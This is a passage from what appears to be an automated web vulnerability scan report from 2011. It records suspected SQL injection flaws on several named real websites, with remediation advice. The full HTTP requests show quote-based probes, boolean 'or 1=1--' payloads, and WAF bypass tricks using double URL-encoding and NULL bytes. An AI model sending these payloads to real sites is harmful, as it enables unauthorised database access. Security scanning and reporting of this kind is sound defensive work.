The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adsc%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc%2527%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 235
Keep-Alive: timeout=120, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc%27%27/d724324/27/726813/randm.js was not found
...[SNIP]...

1.4. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/752289/randm.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d724324/27%00'/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d724324/27%00''/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 213
Keep-Alive: timeout=120, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d724324/27 was not found on this server.</p>
</
...[SNIP]...

1.5. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d747416/11/748729/randm.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d747416/11/748729%00'/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d747416/11/748729%00''/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 220
Keep-Alive: timeout=120, max=902
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d747416/11/748729 was not found on this server.
...[SNIP]...

1.6. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d763769/11/770950/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adsc'/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc''/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc''/d763769/11/770950/randm.js was not found on t
...[SNIP]...

1.7. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d793570/3/793591/randm.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d793570/3%00'/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d793570/3%00''/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 212
Keep-Alive: timeout=120, max=906
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d793570/3 was not found on this server.</p>
</b
...[SNIP]...

1.8. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d798609/10/805369/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc%00'/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc%00''/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 202
Keep-Alive: timeout=120, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc was not found on this server.</p>
</body></html
...[SNIP]...

1.9. http://blog.supermedia.com/archives/tips/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21150963'%20or%201%3d1--%20 and 21150963'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /archives/tips21150963'%20or%201%3d1--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Thu, 03 Feb 2011 19:48:47 GMT
Server: Unspecified
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/

Request 2

GET /archives/tips21150963'%20or%201%3d2--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 2

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:49:06 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed/" />
<link rel="alternate" type="application/atom+xml" title="Atom Feed" href="/feed/atom/" />

<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<link rel="stylesheet" type="text/css" href="/main.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">

<meta name="keywords" content="directory advertising options, business directory marketing options, directory options, yellow pages, business directories, Spanish yellow pages, digital directories">
<meta name="description" content="Our directories complement each other to give you an unmatched reach to every audience imaginable including companion directories, bilingual and spanish directories, business to businesss (b2b) directories and digital directories.">
<link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/sup
...[SNIP]...

1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://docs.jquery.com
Path:   /UI/Dialog

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /UI/Dialog?1%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:07:57 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<title>Database error - jQuery JavaScript Library</title>
...[SNIP]...

Request 2

GET /UI/Dialog?1%2527%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:08:53 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...

1.11. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5453
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11282
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MHEEKNBBLHOHJNHBIPNHJKNL; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

1.12. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1369
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=CJEEKNBBDCJDLMEACLODNOPI; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'</title>
<meta name="descri
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=EJEEKNBBLAHNPDBHLMHJLNKM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...

1.13. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5859
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=NIMOGJOBDKLPJKOOCEPBMLJI; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11730
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=MJMOGJOBEPNDDLCHJDPLEIAF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

1.14. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22'/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=BNMOGJOBONCKHCHLACPLEBGD; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'/"NS="ALERT(0X0006C1)</title
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22''/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11750
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=JNMOGJOBBHGDIKEGFOMAOLDA; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''/"NS="ALERT(0X0006C1)</titl
...[SNIP]...

1.15. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
